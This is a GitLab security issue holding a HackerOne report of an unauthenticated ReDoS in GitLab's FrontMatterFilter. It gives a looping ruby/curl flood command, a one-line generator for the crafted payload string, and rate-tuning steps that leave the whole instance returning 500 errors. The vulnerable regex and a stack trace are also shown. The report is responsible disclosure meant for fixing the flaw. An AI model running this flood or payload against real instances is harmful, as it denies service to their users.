ReDoS via FrontMatterFilter in any Markdown fields
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #1943819](https://hackerone.com/reports/1943819)** by `ryhmnlfj` on 2023-04-12, assigned to @greg:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
#### Summary
I found the server-side ReDoS via `FrontMatterFilter` in any Markdown fields.
An attacker can take down the GitLab instance by sending the **unauthenticated requests** which contain the crafted payload to the `preview_markdown` endpoint.
#### Preparation before reproducing the bug
Please install the command line tools `ruby` and `curl` on your computer.
Also, please download `FrontMatterFilter_ReDoS_payload.json` attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
**DO NOT try to reproduce this bug against `gitlab.com` or other public instances.**
#### Steps to reproduce
1. Set up and launch your GitLab instance, and create a new account on it.
2. Sign in to the account you created in step 1.
3. Create a new **public group** and make a note of **the public group name** at this time.

4. Sign out as you will be accessing as an unauthenticated user in the following steps.
5. After launching your browser's developer tools, browse to the **public group** you created in step 3 as an unauthenticated user.
6. Check the HTML rendered in step 5 and take a note of the content of `csrf-token` at this time.

7. Check the request sent to your GitLab instance in step 5 and take a note the value of `_gitlab_session` at this time.

8. Close your browser and open a command console.
9. Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
* Command template:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data [@]FrontMatterFilter_ReDoS_payload.json http://[YOUR_GITLAB_INSTANCE_DOMAIN]/groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
```
* Replacement table:
| String in the command template | Replace with |
|---------------------------------|------------------------------------------------|
| `[CSRF_TOKEN_VALUE]` | the content of `csrf-token` noted in step 6 |
| `[SESSION_VALUE]` | the value of `_gitlab_session` noted in step 7 |
| `[YOUR_GITLAB_INSTANCE_DOMAIN]` | the domain string of your instance |
| `[PUBLIC_GROUP_NAME]` | **the public group name** noted in step 3 |
For reference, here's an example in my local environment:
```
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data [@]FrontMatterFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
```
10. Change the current directory of the command console to the directory where `FrontMatterFilter_ReDoS_payload.json` is saved.
11. Run the command constructed in step 9 in the command console, and confirm the significant consumption of CPU resource.
For reference, when I ran the above command, the CPU resource of my instance with 16 CPU cores and 32GB of memory was quickly exhausted.

_NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports._
_NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability._
###### Details about the command constructed in step 9:
The executed command send 1 request per second, and each 1 request that triggers ReDoS exhaust the resources of 1 CPU core.
The GitLab instance has the default timeout of 60 seconds per request. However, because the load per request is too high, there are many worker processes that do not finish processing even after the timeout has passed.
#### Additional informations to confirm this vulnerability meets the `A:H` and `S:C` criteria
_IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for `A:H` and `S:C`. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid._
If the GitLab instance is attacked at a well-tuned RPS(requests per second) rate for a reasonable amount of time, then as long as the attack continues, the instance will take 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, `500 error` will be returned for each and every request.

I describe below how to attack at a well-tuned RPS rate for a reasonable amount of time **by using the command constructed in step 9 of "Steps to reproduce" section** of this report.
1. Before running the constructed command, maintain separate session as an authenticated user by signing into the instance with a different browser than the one that obtained the unauthenticated user's CSRF token and session.
2. Iterate on executing the constructed command and adjusting the RPS rate.
The constructed command will display the PIDs of the spawned `curl` processes and the responses from the instance in the console.
Please adjust the RPS rate as described below so that 1 or 2 PIDs and several `500 error` responses are alternately displayed.
* We can adjust the RPS rate by changing the `sleep` value at the end of the command. For example, changing to `sleep 1;` will result in `RPS = 1`, `sleep 0.5;` will result in `RPS = 2`, and `sleep 2;` will result in `RPS = 0.5`.
* We need to adjust the RPS rate so that [it does not exceed the "Test RPS rates" (discribed in "Clarifying notes")](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes). As an example, for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html), "Test RPS rates" is 2 RPS.
_NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command to see the PID and error response alternately displayed. There is no problem if the PIDs is displayed continuously occasionally, but if it is clearly not working, please stop the command and adjust the RPS rate._
3. **With the tuned command still running**, visit any page on the instance with the authenticated user's session maintained in step 1 of this section.
And check if the `500 error` is returned after a response delay of 60+ seconds.
After you start getting `500 errors` for authenticated requests, wait tens of minutes and you'll start getting `500 errors` for unauthenticated requests and requests to the API.
_NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests._
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
```
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
```
Since I was using the [`gitlab/gitlab-runner:alpine` image](https://docs.gitlab.com/runner/install/docker.html#docker-images) for testing, I ran `docker logs` command to see the runner logs.
Additionally, in a pipeline that started overlapping the above DoS state, the jobs failed with timeout because the runner was unable to communicate with the instance, and subsequent job on the pipeline was not run.


These mean that the instance has been completely taken down, so this vulnerability fully meets [`A:H` criteria](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/#clarifying-notes).
It also meets `S:C` criteria because the instance returns `500 error` for any HTTP request from other components and impacts the behavior of other components in no small way.
#### What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/gitlab/front_matter.rb#L3-20
```ruby
module Gitlab
module FrontMatter
DELIM_LANG = {
'---' => 'yaml',
'+++' => 'toml',
';;;' => 'json'
}.freeze
DELIM = Regexp.union(DELIM_LANG.keys)
PATTERN = %r{
\A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
(?<before>\s*)
^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
(?<front_matter>.*?) # front matter block content (not greedy)
^(\k<delim> | \.{3}) # closing front matter marker
[^\S\r\n]*(\R|\z)
}mx.freeze
```
Performing regular expression matching with `Gitlab::FrontMatter::PATTERN` on the specially crafted string causes severe backtracking.
This crafted string can be easily generated with the Ruby code `"coding:" * 120_000 + "\n" * 80_000 + ";"`.
The matching with `Gitlab::FrontMatter::PATTERN` against the actual input string is performed in the `FrontMatterFilter::call` method below.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/banzai/filter/front_matter_filter.rb#L3-9
```ruby
module Banzai
module Filter
class FrontMatterFilter < HTML::Pipeline::Filter
def call
lang_mapping = Gitlab::FrontMatter::DELIM_LANG
html.sub(Gitlab::FrontMatter::PATTERN) do |_match|
```
#### What is the expected correct behavior?
We should either rewrite `Gitlab::FrontMatter::PATTERN` so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
#### Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace when one request was forcefully stopped after 60+ seconds.
```
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/front_matter_filter.rb:9:in `sub'
lib/banzai/filter/front_matter_filter.rb:9:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:128:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:46:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
```
#### Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition `15.10.2-ee`.
I used `Chromium 112` and `Firefox 112` on Debian 11 to verify this bug.
###### Results of GitLab environment info
Output of `sudo gitlab-rake gitlab:env:info`:
```
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.5p211
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.10.2-ee
Revision: a54d6973eae
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
```
#### Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire the GitLab instance.
Based on [the policy of GitLab's Bug Bounty Program](https://hackerone.com/gitlab?view_policy=true), past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
8.6 (High)
```
I would also like to add some detailed explanations of the notable points in the above score.
* `PR:N` : As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker.
* `S:C` : Since this ReDoS attack causes all endpoints of the GitLab instance to become unresponsive, it also affects the behavior of other components that rely on HTTP communication with the instance. For example, [user-configured integrations](https://docs.gitlab.com/ee/integration/), uploading artifacts from [runners](https://docs.gitlab.com/runner/), [GitLab Pages](https://docs.gitlab.com/ee/administration/pages/) that rely on downloading artifacts, etc. are affected by the unresponsive state of the GitLab instance.
* `A:H` : This ReDoS attack causes enough load to meet the `A:H` criteria for the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html) as stated in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
More specifically, this attack clearly satisfies the "Clarifying notes" condition in [GitLab CVSS Calculator page](https://gitlab-com.gitlab.io/gl-security/appsec/cvss-calculator/).
> When evaluating Availability impacts for DoS that require sustained traffic, use the [1k Reference Architecture](https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html). The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as `A:H`.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [FrontMatterFilter_ReDoS_payload.json](https://h1.sec.gitlab.net/a/40760983-7ec1-4142-9a86-b7473bf89573/FrontMatterFilter_ReDoS_payload.json)
* [create_public_group.png](https://h1.sec.gitlab.net/a/5f922732-0568-4710-a8b4-c94c7965fcf7/create_public_group.png)
* [csrf_token.png](https://h1.sec.gitlab.net/a/8b0fd84a-13b9-41a5-81f0-f01a9ad9b66f/csrf_token.png)
* [session_value.png](https://h1.sec.gitlab.net/a/2f3a5f61-1c9c-42fc-81a7-9c78b447474f/session_value.png)
* [htop_all_cores_exhausted.png](https://h1.sec.gitlab.net/a/bcc5ec5e-cd8c-4d12-8953-467ba83cf445/htop_all_cores_exhausted.png)
* [500_error.png](https://h1.sec.gitlab.net/a/d03848b1-7307-4b47-a474-5021b24d9696/500_error.png)
* [failed_pipeline.png](https://h1.sec.gitlab.net/a/b8bb36a7-2777-458d-bc2b-8f322fc597ee/failed_pipeline.png)
* [failed_jobs_timeout.png](https://h1.sec.gitlab.net/a/40464c34-b5dd-4807-af25-5a7a8986d9fb/failed_jobs_timeout.png)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
issue